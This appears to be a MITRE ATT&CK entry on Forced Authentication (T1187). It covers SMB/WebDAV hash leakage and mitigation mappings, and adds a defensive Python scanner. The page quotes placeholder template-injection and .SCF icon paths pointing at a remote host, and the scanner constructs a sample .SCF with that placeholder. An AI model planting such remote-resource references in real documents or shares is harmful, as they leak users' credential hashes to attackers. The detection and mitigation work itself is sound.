T1187 Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on a navigation path for privileged accounts (e.g. an .SCF file placed on the desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary-controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)

There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\\[remote address]\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
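As an added, defender-side example (not code from the ATT&CK page or any of the mapped frameworks), the scanner below flags the two artifact types named above: an Office document whose attachedTemplate relationship points at a remote file:// or UNC location, and an .SCF whose IconFile references a UNC path. The sample document and .SCF it checks are constructed inline, reusing the page's [remote address] placeholder.

```python
"""Flag document and shortcut artifacts that reference a remote resource and would
trigger automatic SMB/WebDAV authentication when opened or rendered (ATT&CK T1187).
Added example, not part of the ATT&CK page; all sample inputs are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Remote forms named in the text: a UNC path (\\host\...) or a file://host/ or
# http(s):// URL; file:///C:/... and file://C:/... are local and not flagged.
REMOTE_TARGET = re.compile(
    r"^(?:\\\\[^\\/]+[\\/]|file://(?!/|[a-z]:)[^/]+/|https?://)", re.IGNORECASE)
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                 "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"

def remote_template_targets(docx_bytes: bytes) -> list[str]:
    """Return External attachedTemplate targets that point to a remote host; a document
    attaching file://<remote>/Normal.dotm is the Template Injection case in the text."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(SETTINGS_RELS))
    return [rel.get("Target", "") for rel in root.iter(f"{{{RELS_NS}}}Relationship")
            if rel.get("Type") == TEMPLATE_TYPE
            and rel.get("TargetMode") == "External"
            and REMOTE_TARGET.match(rel.get("Target", ""))]

def remote_scf_icons(scf_text: str) -> list[str]:
    """Return IconFile= values in a .SCF (Shell Command File) that point to a UNC path."""
    hits = []
    for line in scf_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "iconfile" and REMOTE_TARGET.match(value.strip()):
            hits.append(value.strip())
    return hits

def build_sample_docx(template_target: str) -> bytes:
    """Constructed minimal .docx containing only the part the scanner reads."""
    rels = (f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId1" '
            f'Type="{TEMPLATE_TYPE}" Target="{template_target}" TargetMode="External"/>'
            "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()

# Constructed .SCF using the page's [remote address] placeholder as the icon host.
SAMPLE_SCF = "[Shell]\nIconFile=\\\\[remote address]\\pic.png\n"
```

A local attached template (file:///C:/...) is deliberately not reported, since benign documents commonly carry one; only references that would leave the host are flagged.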

CRI Profile Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
PR.AA-03.01 | Authentication requirements | Mitigates | T1187 | Forced Authentication |
  Comments: This diagnostic statement describes how the organization implements appropriate authentication requirements, including selecting mechanisms based on risk, utilizing multi-factor authentication where necessary, and safeguarding the storage of authenticators like PINs and passwords to protect sensitive access credentials.
PR.IR-01.02 | Network device configurations | Mitigates | T1187 | Forced Authentication |
  Comments: This diagnostic statement provides protection through secure network device configurations (e.g., firewall rules, ports, protocols) aligned to security baselines. Using network appliances to block or filter network traffic that is not necessary within the environment can prevent adversaries from obtaining credentials through forced authentication.
PR.IR-01.03 | Network communications integrity and availability | Mitigates | T1187 | Forced Authentication |
  Comments: This diagnostic statement protects against Forced Authentication through the use of secure network configurations, architecture, implementations of zero trust architecture, and segmentation.
PR.AA-01.01 | Identity and credential management | Mitigates | T1187 | Forced Authentication |
  Comments: This diagnostic statement protects against Forced Authentication through the use of hardened access control policies, secure defaults, password complexity requirements, multifactor authentication requirements, and removal of terminated accounts.
PR.PS-01.08 | End-user device protection | Mitigates | T1187 | Forced Authentication |
  Comments: This diagnostic statement protects against Forced Authentication by limiting access to resources to only authorized devices, management of personal computing devices, network intrusion prevention, and the use of antimalware.

NIST 800-53 Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
CA-07 | Continuous Monitoring | mitigates | T1187 | Forced Authentication |
CM-06 | Configuration Settings | mitigates | T1187 | Forced Authentication |
SI-10 | Information Input Validation | mitigates | T1187 | Forced Authentication |
SI-15 | Information Output Filtering | mitigates | T1187 | Forced Authentication |
CM-02 | Baseline Configuration | mitigates | T1187 | Forced Authentication |
CM-07 | Least Functionality | mitigates | T1187 | Forced Authentication |
SI-04 | System Monitoring | mitigates | T1187 | Forced Authentication |
AC-03 | Access Enforcement | mitigates | T1187 | Forced Authentication |
AC-04 | Information Flow Enforcement | mitigates | T1187 | Forced Authentication |
SC-07 | Boundary Protection | mitigates | T1187 | Forced Authentication |

VERIS Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
action.hacking.variety.Abuse of functionality | Abuse of functionality. | related-to | T1187 | Forced Authentication |
action.hacking.variety.AiTM | Adversary-in-the-middle attack. Child of 'Exploit vuln' | related-to | T1187 | Forced Authentication |
action.hacking.variety.Use of stolen creds | Use of stolen or default authentication credentials (including credential stuffing) | related-to | T1187 | Forced Authentication |
attribute.confidentiality.data_disclosure | None | related-to | T1187 | Forced Authentication |

GCP Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
cloud_ngfw | Cloud Next-Generation Firewall (NGFW) | technique_scores | T1187 | Forced Authentication |
  Comments: Cloud NGFW can allow or deny traffic based on the traffic's protocol, destination ports, sources, and destinations. This functionality can be used to block SMB and WebDAV traffic from exiting the network, which prevents adversaries from forcing authentication over SMB and WebDAV. This mapping is given a score of Significant because Cloud NGFW can block this traffic or restrict where it can go.

AWS Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
aws_network_firewall | AWS Network Firewall | technique_scores | T1187 | Forced Authentication |
  Comments: AWS Network Firewall has the ability to pass, drop, or alert on traffic based on the network protocol as well as perform deep packet inspection on the payload. This functionality can be used to block SMB and WebDAV traffic from exiting the network, which prevents adversaries from forcing authentication over SMB and WebDAV. This mapping is given a score of Significant because AWS Network Firewall can block this traffic or restrict where it can go.